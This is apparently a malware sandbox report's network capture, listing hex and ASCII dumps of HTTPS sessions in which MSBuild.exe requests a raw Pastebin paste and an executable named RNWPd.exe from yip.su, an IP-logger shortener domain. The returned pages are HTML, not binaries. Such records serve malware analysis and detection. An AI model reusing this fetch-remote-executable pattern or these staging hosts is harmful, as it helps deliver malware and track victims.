                    2024-09-16 19:20:18 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:20:18 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:20:18 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:20:18 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:20:18 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:20:18 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:20:18 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.649723104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:22 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:22 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4336a27f2919eb-EWR
                    2024-09-16 19:20:22 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:20:22 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:20:22 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:20:22 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:20:22 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.649724188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:22 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:20:22 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:20:22 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:20:22 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYzDunHZ3Z5l5omUs73ZaznI5dyb3sehL2TJjFsAlW1OilrxHf%2F7TDPTqlmO6qpS3Y54H2%2F7r28vyth4jgY7VpSL74dZU6ZyRWKuPqeuX6rwDjVGP3q89SU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4336a6bf9d1895-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:20:22 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:20:22 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:20:22 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:20:22 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:20:22 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:20:22 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:20:22 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:20:22 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.649729104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:27 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:28 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4336c76f7bc472-EWR
                    2024-09-16 19:20:28 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
